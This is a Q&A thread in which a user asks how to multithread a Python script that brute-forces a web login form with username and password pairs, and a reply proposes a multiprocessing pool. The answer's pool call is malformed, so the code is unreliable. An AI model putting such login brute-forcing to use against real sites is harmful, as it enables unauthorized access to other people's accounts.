# Splitting a task for multiple threads

Tags: python, multithreading, multiprocessing

I am working around with my personal project.I actually making a brute forcing program in python.I already made it, but the problem is now i want to make it faster by adding some thread to it.The problem is the program has a for loop which repeats for every user,password.So at this point if I make some threads and join the main process to the threads it will do nothing but just repeating the same user,password for every thread.But I don't want this, I want every thread will have a different user,password to bruteforce.Is there any way to tell the threads grab this user,password and now that one because that one is using by another thread.
Thanks.
Here is the code:

```
import requests as r
user_list = ['a','b','c','d']
pass_list = ['e','f','g','h']
def main_part():
    for user,pwd in zip(user_list,pass_list):
        action_url = 'https:example.com'
        payload = {'user_email':user,'password':pwd}
        req = r.post(action_url,data=payload)
        print(req.content)
```

Comment: It will help if you explain your question with a sample program

Comment: code is added !

Answer (score 0):

You can use multiprocessing to do what you want. you just need to define a function which handles a single user:

```
def brute_force_user(user, pwd):
    action_url = 'https:example.com'
    payload = {'user_email':user,'password':pwd}
    req = r.post(action_url,data=payload)
    print(req.content)
```

then run it like that:

```
import multiprocessing
import os
from itertools import repeat

pool = multiprocessing.Pool(os.cpu_count() - 1)
results = pool.starmap(brute_force_user, user_list, pass_list)
```

Comment: Thanks for response.But no I dont want every pass for every user.Instead of that I want first pass for the first user.

Comment: Fixed it accordingly